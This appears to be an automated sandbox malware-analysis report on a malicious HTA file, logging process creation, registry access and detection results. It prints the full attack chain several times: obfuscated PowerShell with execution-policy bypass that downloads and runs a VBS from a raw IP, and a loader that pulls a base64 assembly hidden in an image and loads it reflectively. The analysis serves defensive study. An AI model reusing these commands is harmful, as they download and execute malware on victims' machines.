Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim cmd 'string: ShellExecute arg #1	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: 'Class scope: args_ 'string: ShellExecute arg #2	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim pwd 'string: ShellExecute arg #3	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: Dim privileges 'string: ShellExecute arg #4	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Dropped file: .ShellExecute cmd, args_, pwd, privileges	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_009D0875	3_2_009D0875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_03438CD0	7_2_03438CD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343C3CF	7_2_0343C3CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343D10A	7_2_0343D10A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343D118	7_2_0343D118
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343C069	7_2_0343C069
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343C02B	7_2_0343C02B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343757D	7_2_0343757D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_034375C7	7_2_034375C7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_034375E5	7_2_034375E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343A440	7_2_0343A440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343A42F	7_2_0343A42F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343D9C0	7_2_0343D9C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343B868	7_2_0343B868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343B878	7_2_0343B878
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343A819	7_2_0343A819
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343A828	7_2_0343A828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_03439E00	7_2_03439E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_03438CC1	7_2_03438CC1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0343BCF1	7_2_0343BCF1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_03437648	7_2_03437648

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2087
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2054
Source: C:\Windows\SysWOW64\mshta.exe	Process created: Commandline size = 2087	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Commandline size = 2054	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2492, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winHTA@16/16@2/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\economicthingsaregoingaroundwithhusbandwithgoodnewsgreatforeverybodygiven[1].tiff

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1rxrwjp.r5z.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	Virustotal: Detection: 30%
Source: mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta	ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\mniscreenthinkinggoodforentiretimegoodfotbusubessthings.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e0waei52\e0waei52.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4B4.tmp" "c:\Users\user\AppData\Local\Temp\e0waei52\CSC9C05B393FD2448C976B42B57429CCF7.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\economicthingsaregoingaroundwithhusbandwithgoodne.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$antisiphonal = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg ';$orlage = New-Object System.Net.WebClient;$centralised = $orlage.DownloadData($antisiphonal);$slanshacks = [System.Text.Encoding]::UTF8.GetString($centralised);$commends = '<<BASE64_START>>';$Lemaitre = '<<BASE64_END>>';$ependymis = $slanshacks.IndexOf($commends);$transcolation = $slanshacks.IndexOf($Lemaitre);$ependymis -ge 0 -and $transcolation -gt $ependymis;$ependymis += $commends.Length;$scribblage = $transcolation - $ependymis;$dorsolumbar = $slanshacks.Substring($ependymis, $scribblage);$keltologist = -join ($dorsolumbar.ToCharArray() \| ForEach-Object { $_ })[-1..-($dorsolumbar.Length)];$carinately = [System.Convert]::FromBase64String($keltologist);$brite = [System.Reflection.Assembly]::Load($carinately);$helygia = [dnlib.IO.Home].GetMethod('VAI');$helygia.Invoke($null, @('0/qvVum/r/ee.etsap//:sptth', 'creance', 'creance', 'creance', 'CasPol', 'creance', 'creance','creance','creance','creance','creance','creance','1','creance','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErshELl -Ex byPaSs -Nop -w 1 -c DeVICECReDenTIAldEPloYMEnt ; inVOKE-eXPRESsion($(iNVOkE-exPrEssIon('[SYsTem.TeXt.EnCOdING]'+[char]58+[char]0X3a+'utf8.GEtSTrIng([SYSTEM.conveRT]'+[cHar]0X3A+[CHaR]58+'fROMbaSE64strIng('+[CHAr]34+'JDh3TTJ1VkQzTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRUZJTklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpaZFBhRk1ERXlMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUHNGc2JTUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlWWhZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoRmJDZCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVFZBaVRZeHAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lc3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdXpGVHJGRWwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOHdNMnVWRDNNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNTcuMTI5LjU1LjIyNS8yMjUvZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZXdzZ3JlYXRmb3JldmVyeWJvZHlnaXZlbi50SUYiLCIkZU5WOkFQUERBVEFcZWNvbm9taWN0aGluZ3NhcmVnb2luZ2Fyb3VuZHdpdGhodXNiYW5kd2l0aGdvb2RuZS52YnMiLDAsMCk7U3RBclQtU0xlRVAoMyk7aW5Wb0tFLUVYcHJlU3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxlY29ub21pY3RoaW5nc2FyZWdvaW5nYXJvdW5kd2l0aGh1c2JhbmR3aXRoZ29vZG5lLnZicyI='+[ChaR]0x22+'))')))"	Jump to behavior
